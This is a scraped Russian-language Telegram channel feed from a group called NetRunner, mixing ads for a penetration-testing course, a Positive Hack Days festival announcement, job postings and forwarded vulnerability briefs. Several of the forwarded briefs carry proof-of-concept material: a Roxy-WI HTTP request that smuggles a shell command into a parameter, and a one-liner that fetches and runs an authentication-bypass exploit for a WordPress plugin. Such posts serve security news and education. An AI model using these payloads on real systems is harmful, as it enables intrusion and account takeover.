Forwarded from RESOLUTE ATTACK
This media is not supported in your browser
VIEW IN TELEGRAM
❤🔥6👍4🔥3❤1🤔1
Немного инфы для тех кто недавно присоединился, наш популярный курс по подготовке к PRTT ⛈
По окончанию курса вы получите актуальные навыки и знания для развития в сфере тестирования на проникновение.
Курс рассчитан на новичков в It и тех кто уже начал свой путь.
Так как я не выкладывал план обучения то вот в вкратце:
ЧТО ВЫ ПОЛУЧИТЕ В ТЕЧЕНИЕ КУРСА?
1. Основы языка Python и библиотеки для проведения пентеста
2. Понимание OWASP
3. Знания в сфере OSINT и Google Dorking
4. Администрирование Линукса
5. Правильное ведение отчётов
6. Будете работать с Сетями, Удаленным доступом и VPN
7. Узнаете о классификациях атак
8. Научитесь автоматизировать процессы
9. Научитесь пользоваться Burp Suite
10. 26 Практических заданий по темам
И небольшое обновление по практическим работам которое многих заинтересовало: когда вы будете взламывать уязвимые машины, будете писать отчеты, и если отсчёт будет написан неправильно или "на отьебись", вы не получите доступ к следующим заданиям.
Естественно вам будут показывать ваши ошибки)
Удачи с практикой 😉
P.S. По всем вопросам @TripiniFKYL
По окончанию курса вы получите актуальные навыки и знания для развития в сфере тестирования на проникновение.
Курс рассчитан на новичков в It и тех кто уже начал свой путь.
Так как я не выкладывал план обучения то вот в вкратце:
ЧТО ВЫ ПОЛУЧИТЕ В ТЕЧЕНИЕ КУРСА?
1. Основы языка Python и библиотеки для проведения пентеста
2. Понимание OWASP
3. Знания в сфере OSINT и Google Dorking
4. Администрирование Линукса
5. Правильное ведение отчётов
6. Будете работать с Сетями, Удаленным доступом и VPN
7. Узнаете о классификациях атак
8. Научитесь автоматизировать процессы
9. Научитесь пользоваться Burp Suite
10. 26 Практических заданий по темам
И небольшое обновление по практическим работам которое многих заинтересовало: когда вы будете взламывать уязвимые машины, будете писать отчеты, и если отсчёт будет написан неправильно или "на отьебись", вы не получите доступ к следующим заданиям.
Естественно вам будут показывать ваши ошибки)
Удачи с практикой 😉
P.S. По всем вопросам @TripiniFKYL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥6😍6🤔3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18🤔10❤🔥6👍2
Forwarded from Positive Technologies
🎊 Уже в пятницу в московском Парке Горького начнется киберфестиваль Positive Hack Days 12!
Он будет проходить два дня, 19 и 20 мая, и будет доступен бесплатно для всех желающим. Приходите всей семьей!
Мы подготовили для вас футуристичные инсталляции и обширную программу, которая поможет вам разобраться, как устроен современный цифровой мир и повысить уровень своей защищенности.
В Кибергороде на территории парка вас будут ждать:
🐴 Арт-объект «Троян vs Кибергеоргий». Прямо у подножья арт-объекта будет находиться музей «Хранилище кибермонстров», где вы сможете узнать много нового о фишинговых рассылках, ловушках в соцсетях и приложениях для знакомств.
🚗 «Шоссе киберэнтузиастов» — одна из самых оживленных улиц, трафик на которой и работу светофоров полностью регулировала система умного перекрестка. Но хакеры ее взломали, что стало причиной крупной аварии.
🎪 «Скамотопия» — парк развлечений во главе с эксцентричным хозяином. Вас ждет множество аттракционов и шоу-программа от цирковых артистов, но будьте осторожны: здесь повсюду обман. Не попадитесь на уловки мошенников, пока выполняете задания в Скамотопии!
Также для всех участников киберфестиваля смогут пройти квест, в котором нужно будет помочь исследователям безопасности защитить Кибергород от хакеров и получить за это ценные призы! 🎁
На главной сцене парка эксперты крупнейших технологических компаний расскажут, как защищать свои аккаунты в соцсетях, поделятся, что хакерам известно о ваших паролях, а также погрузят вас в мир WEB 3.0.
🕺 Завершится PHDays 12 концертом «МаякФест», посвященным Владимиру Маяковскому. На концерте прозвучат песни на его стихи в сопровождении симфонического оркестра, а также стихи современных поэтов.
До встречи 19 и 20 мая в Парке Горького!
#PHD12
Он будет проходить два дня, 19 и 20 мая, и будет доступен бесплатно для всех желающим. Приходите всей семьей!
Мы подготовили для вас футуристичные инсталляции и обширную программу, которая поможет вам разобраться, как устроен современный цифровой мир и повысить уровень своей защищенности.
В Кибергороде на территории парка вас будут ждать:
🎪 «Скамотопия» — парк развлечений во главе с эксцентричным хозяином. Вас ждет множество аттракционов и шоу-программа от цирковых артистов, но будьте осторожны: здесь повсюду обман. Не попадитесь на уловки мошенников, пока выполняете задания в Скамотопии!
Также для всех участников киберфестиваля смогут пройти квест, в котором нужно будет помочь исследователям безопасности защитить Кибергород от хакеров и получить за это ценные призы! 🎁
На главной сцене парка эксперты крупнейших технологических компаний расскажут, как защищать свои аккаунты в соцсетях, поделятся, что хакерам известно о ваших паролях, а также погрузят вас в мир WEB 3.0.
🕺 Завершится PHDays 12 концертом «МаякФест», посвященным Владимиру Маяковскому. На концерте прозвучат песни на его стихи в сопровождении симфонического оркестра, а также стихи современных поэтов.
До встречи 19 и 20 мая в Парке Горького!
#PHD12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5❤3
NETRUNNER GROUP
Предпродажа открыта ⛈ Расскажу немного больше о курсе: 1) Вам будет постепенно и структурировано выдаваться информация. Так, что бы вы могли ее комфортно изучить. 2) Раз в неделю наши менторы будут в формате онлайн отвечать на ваши вопросы. 3) Постепенно…
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥7👍3
Обновление по курсу ⛈
1) Мы полностью перенесли курс на наш сайт: https://cybernetrunner.ru
И выглядит это просто отлично😘
Если мы изначально думали вам отдать его на платформе Notions, которая если честно подлагивает и сидеть там не сильно приятно, то на нашем сайте все работает отлично)
2) Мы доделали практические задания, и их даже будет больше чем мы обещали, целых 30)
3) Ждите наш курс на еще одной обучающей платформе)
P.S. Мы расширили места и все еще можно записаться, ждём вас❤️
1) Мы полностью перенесли курс на наш сайт: https://cybernetrunner.ru
И выглядит это просто отлично
Если мы изначально думали вам отдать его на платформе Notions, которая если честно подлагивает и сидеть там не сильно приятно, то на нашем сайте все работает отлично)
2) Мы доделали практические задания, и их даже будет больше чем мы обещали, целых 30)
3) Ждите наш курс на еще одной обучающей платформе)
P.S. Мы расширили места и все еще можно записаться, ждём вас
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤6🔥4🤔1
NETRUNNER GROUP
Скоро будет что то очень интересное ⛈
Как и обещал ⛈
Гость: Сергей TripiniFKYL Поправкин - CEO NetRunner
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации и узнать как он пришел к созданию собственной онлайн школы в 20 лет.
🔺 Просмотр по ссылке:
https://www.youtube.com/watch?v=ZTIR13PkV0Y
Гость: Сергей TripiniFKYL Поправкин - CEO NetRunner
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации и узнать как он пришел к созданию собственной онлайн школы в 20 лет.
https://www.youtube.com/watch?v=ZTIR13PkV0Y
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
RA PODCAST #1 | TripiniFKYL
RESOLUTE ATTACK тестит новый формат: RA PODCAST
Сергей TripiniFKYL Поправкин - CEO NetRunner.
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT.
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации…
Сергей TripiniFKYL Поправкин - CEO NetRunner.
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT.
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации…
👍9❤🔥5😍4❤2
Forwarded from Похек (Сергей Зыбнев)
🔴KeePass 2.X Master Password Dumper
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
👍6❤3❤🔥2🔥2
"Что такое этот ваш Netrunner" V.2? 🤔
Информация для новоприбывших и тех кто тут потерялся.
Мы дружное сообщество этичных хакеров и тех кто по-настоящему любит ИБ
Что мы можем вам предложить?
1. Контент от нашей команды редакторов, авторские статьи, разбор кейсов, контент от партнеров)
2. Предоставляем авторские курсы для новичков, с самой востребованной информацией на рынке.
3. Партнерство, мы открыты к интересным предложениям с вашей стороны)
4. Отсутствие рекламы, в данный момент мы только лишь рекомендуем наших партнеров.
5. Возобновляем YouTube и VK, подписывайтесь!
Там будет выходить эксклюзивный контент👌
6. Так же у нас есть чат к в котором вы получите помощь и теплое общение)
По всем вопросам: @netrunner_1G
Партнерство: @TripiniFKYL
P.S. С любовью, команда NR)
Информация для новоприбывших и тех кто тут потерялся.
Мы дружное сообщество этичных хакеров и тех кто по-настоящему любит ИБ
Что мы можем вам предложить?
1. Контент от нашей команды редакторов, авторские статьи, разбор кейсов, контент от партнеров)
2. Предоставляем авторские курсы для новичков, с самой востребованной информацией на рынке.
3. Партнерство, мы открыты к интересным предложениям с вашей стороны)
4. Отсутствие рекламы, в данный момент мы только лишь рекомендуем наших партнеров.
5. Возобновляем YouTube и VK, подписывайтесь!
Там будет выходить эксклюзивный контент
6. Так же у нас есть чат к в котором вы получите помощь и теплое общение)
По всем вопросам: @netrunner_1G
Партнерство: @TripiniFKYL
P.S. С любовью, команда NR)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤5😍3🔥2
NetRunner ищет новые кадры к себе в команду
Мы станем вашим трамплином в профессиональную деятельность
Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер
Контакты для связи: @netrunner_1G
Мы станем вашим трамплином в профессиональную деятельность
Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер
Контакты для связи: @netrunner_1G
👍4🤔4❤🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
PoC:
#CVE #POC
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
/app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.PoC:
POST /app/options.py HTTP/1.1";id+##&backend_server=127.0.0.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
#CVE #POC
❤7
Forwarded from RESOLUTE ATTACK
Видеообзор мероприятия от лица нашей команды. Positive technologies, Codeby, Innostage и другие известные компании.
И многое другое в нашем видеоролике - https://youtu.be/MYfDoC2JC4M
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Обзор PHD 12 | Positive Hack Days 12
RESOLUTE ATTACK приехал в Московский Парк Горького на PHdays '12, чтобы вкратце показать вам как это было.
Positive Hack Days — форум по кибербезопасности, объединяющий экспертов по ИБ и этичных хакеров со всего мира.
Live студия, Stand Off, взломы банкоматов…
Positive Hack Days — форум по кибербезопасности, объединяющий экспертов по ИБ и этичных хакеров со всего мира.
Live студия, Stand Off, взломы банкоматов…
👍3🔥3❤2
По завершению второго и третьего месяца обучения на нашем курсе, будет проходить отбор из лучших учеников для практики, c нашими ведущими специалистами из отдела Pentest.
1. Доступ к реальным кейсам компании
2. Личные практические задания
3. Корпоративный контент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤🔥5🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u https://TARGET#CVE #POC
❤9👍3